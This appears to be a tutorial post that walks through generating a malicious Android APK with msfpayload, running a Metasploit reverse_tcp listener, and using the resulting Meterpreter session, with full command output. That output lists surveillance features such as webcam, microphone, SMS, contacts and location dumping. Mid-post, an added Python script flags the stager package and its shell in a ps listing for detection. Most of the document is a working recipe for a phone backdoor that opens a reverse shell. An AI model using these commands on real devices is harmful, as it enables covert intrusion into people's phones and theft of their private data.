Create a malicious apk file
Create the malicious apk file (backdoor.apk); the R option tells msfpayload to write the payload in raw format.
msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.108 LPORT=4444 R > backdoor.apk
Install malicious apk file
For learning, I chose an Android x86 virtual machine. Before the apk is installed on the phone, we must set up an Android meterpreter listener.
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.108
LHOST => 192.168.1.108
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > show options
Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (android/meterpreter/reverse_tcp):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   AutoLoadAndroid  true             yes       Automatically load the Android extension
   LHOST            192.168.1.108    yes       The listen address
   LPORT            4444             yes       The listen port
   RetryCount       10               yes       Number of trials to be made if connection failed

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target
msf exploit(handler) > run
[*] Started reverse handler on 192.168.1.108:4444
[*] Starting the payload handler...
[*] Sending stage (44648 bytes) to 192.168.1.108
[*] Meterpreter session 1 opened (192.168.1.108:4444 -> 192.168.1.108:41175) at 2015-02-23 16:56:32 +0000
meterpreter > help
Core Commands
=============
Command Description
------- -----------
? Help menu
background Backgrounds the current session
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information about active channels
close Closes a channel
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
help Help menu
info Displays information about a Post module
interact Interacts with a channel
irb Drop into irb scripting mode
load Load one or more meterpreter extensions
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
use Deprecated alias for 'load'
write Writes data to a channel
Stdapi: File system Commands
============================
Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lpwd Print local working directory
ls List files
mkdir Make directory
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
upload Upload a file or directory
Stdapi: Networking Commands
===========================
Command Description
------- -----------
ifconfig Display interfaces
ipconfig Display interfaces
portfwd Forward a local port to a remote service
route View and modify the routing table
Stdapi: System Commands
=======================
Command Description
------- -----------
execute Execute a command
getuid Get the user that the server is running as
ps List running processes
shell Drop into a system command shell
sysinfo Gets information about the remote system, such as OS
Stdapi: Webcam Commands
=======================
Command Description
------- -----------
record_mic Record audio from the default microphone for X seconds
webcam_chat Start a video chat
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
webcam_stream Play a video stream from the specified webcam
Android Commands
================
Command Description
------- -----------
check_root Check if device is rooted
dump_calllog Get call log
dump_contacts Get contacts list
dump_sms Get sms messages
geolocate Get current lat-long using geolocation
meterpreter > sysinfo
Computer : localhost
OS : Android 4.4.2 - Linux 3.10.52-android-x86+ (i686)
Meterpreter : java/android
meterpreter > ps
Process List
============
PID Name Arch User
--- ---- ---- ----
1 /init root
2 kthreadd root
3 ksoftirqd/0 root
5 kworker/0:0H root
6 kworker/u2:0 root
7 migration/0 root
8 rcu_preempt root
9 rcu_bh root
10 rcu_sched root
11 watchdog/0 root
12 khelper root
295 writeback root
298 bioset root
299 crypto root
301 kblockd root
346 ata_sff root
353 khubd root
462 kworker/0:1 root
483 kswapd0 root
484 fsnotify_mark root
521 kworker/u2:2 root
660 scsi_eh_0 root
672 scsi_eh_1 root
675 scsi_eh_2 root
728 kworker/0:2 root
747 cfinteractive root
756 binder root
782 deferwq root
810 kworker/0:1H root
890 kpsmoused root
906 /sbin/v86d root
924 /sbin/ueventd root
1010 /system/bin/powerbtnd root
1011 /system/bin/sdcard media_rw
1014 /sbin/healthd root
1015 /system/bin/servicemanager system
1016 /system/bin/vold root
1017 /system/bin/netd root
1018 /system/bin/debuggerd root
1019 /system/bin/rild radio
1020 /system/bin/surfaceflinger root
1021 zygote root
1022 /system/bin/drmserver drm
1023 /system/bin/mediaserver media
1024 /system/bin/installd install
1025 /system/bin/keystore keystore
1026 /system/bin/sh root
1027 /system/bin/sh root
1040 /system/xbin/su root
1041 /sbin/adbd shell
1335 system_server system
1380 /system/bin/dhcpcd dhcp
1425 com.android.systemui u0_a11
1503 com.google.android.inputmethod.latin u0_a48
1517 com.google.android.gms u0_a8
1530 com.android.phone radio
1536 com.cyanogenmod.trebuchet u0_a19
1662 com.google.process.gapps u0_a8
1688 com.google.process.location u0_a8
1929 com.google.android.partnersetup u0_a10
2097 com.android.vending u0_a15
2129 com.thirdparty.superuser system
2143 com.google.android.googlequicksearchbox:search u0_a20
2220 com.android.deskclock u0_a34
2311 android.process.acore u0_a3
2663 com.android.packageinstaller u0_a58
2677 com.android.defcontainer u0_a4
2696 com.android.musicfx u0_a13
2716 com.google.android.apps.docs u0_a37
2736 com.android.gallery3d u0_a42
2757 com.svox.pico u0_a60
2825 android.process.media u0_a6
3361 com.android.settings system
3391 com.google.android.gms.drive u0_a8
3414 com.google.android.gms.wearable u0_a8
3441 com.android.keychain system
3457 com.android.documentsui u0_a36
3473 com.android.externalstorage u0_a7
3781 com.zmappsh u0_a75
3813 com.zmappsh:bdservice_v1 u0_a75
3930 jackpal.androidterm u0_a23
3944 /system/bin/sh u0_a23
4106 lysesoft.andftp u0_a79
4225 com.cyanogenmod.filemanager u0_a28
4240 /system/bin/sh u0_a28
4250 /system/bin/sh u0_a28
4324 com.metasploit.stage u0_a80
4372 wget root
4380 sh u0_a80
4381 ps u0_a80
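The process list above is also where a defender would look: the stager runs under an ordinary app UID (u0_a80) as the package com.metasploit.stage, the default name for Metasploit's Android payloads, and the `shell` command spawns an `sh` child under that same UID. The script below is an added example, not part of the original post, that parses `ps` output in the same PID / Name / User layout and flags those two indicators. The sample listing is constructed from a few lines of the output above; the package list and the UID-correlation heuristic are this example's assumptions, not Metasploit or Android features.

```python
"""Flag Metasploit Android stager indicators in a `ps` listing (added example)."""
import re
from dataclasses import dataclass

# Constructed sample in the post's "PID Name User" layout. It deliberately
# includes jackpal.androidterm with its own sh child, a legitimate terminal
# app, so the shell heuristic must not fire on it.
SAMPLE_PS = """\
PID  Name                          User
1    /init                         root
1021 zygote                        root
1335 system_server                 system
2097 com.android.vending           u0_a15
3930 jackpal.androidterm           u0_a23
3944 /system/bin/sh                u0_a23
4324 com.metasploit.stage          u0_a80
4380 sh                            u0_a80
"""

# Assumption: defenders extend this set from their own telemetry; the default
# package name of a stock Metasploit Android payload is the one seen above.
SUSPICIOUS_PACKAGES = {"com.metasploit.stage"}

# Android assigns installed apps UIDs of the form u0_aNN.
APP_UID = re.compile(r"^u0_a\d+$")
SHELL_NAMES = {"sh", "/system/bin/sh"}


@dataclass
class Proc:
    pid: int
    name: str
    user: str


def parse_ps(text: str) -> list[Proc]:
    """Parse whitespace-separated ps output; header and malformed lines are skipped."""
    procs = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 3:
            continue
        try:
            pid = int(parts[0])
        except ValueError:
            continue  # header row ("PID ...") or noise
        # Name is the second column; User is always the last column, which
        # also tolerates the optional empty Arch column in meterpreter output.
        procs.append(Proc(pid, parts[1], parts[-1]))
    return procs


def find_indicators(procs: list[Proc]) -> list[tuple[int, str, str]]:
    """Return (pid, name, reason) tuples for processes matching the indicators."""
    findings = []
    for p in procs:
        if p.name in SUSPICIOUS_PACKAGES:
            findings.append((p.pid, p.name, "known Metasploit stager package"))

    # A shell under an app UID is common (terminal apps do it), so only flag
    # shells that share a UID with an already-flagged package.
    flagged_uids = {p.user for p in procs if p.name in SUSPICIOUS_PACKAGES}
    for p in procs:
        if p.name in SHELL_NAMES and APP_UID.match(p.user) and p.user in flagged_uids:
            findings.append((p.pid, p.name, f"shell running under flagged app uid {p.user}"))
    return sorted(findings)


if __name__ == "__main__":
    for pid, name, reason in find_indicators(parse_ps(SAMPLE_PS)):
        print(f"{pid:>6}  {name:<28}  {reason}")
```

Run against a real listing (`adb shell ps` or the meterpreter `ps` output saved to a file), the output names only PID 4324 and its shell child 4380; the terminal app's shell at PID 3944 is left alone because its UID is not associated with a flagged package. A package-name match is a weak indicator on its own, since the name is trivially changed at build time, so in practice it belongs alongside installer-source and network-egress checks rather than replacing them.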
Notices
When I installed the apk file on the phone (Tencent security software is installed), it showed me "App not installed".
References:
[1] http://www.hacking-tutorial.com/hacking-tutorial/hacking-android-smartphone-tutorial-using-metasploit
[2] https://community.rapid7.com/thread/4672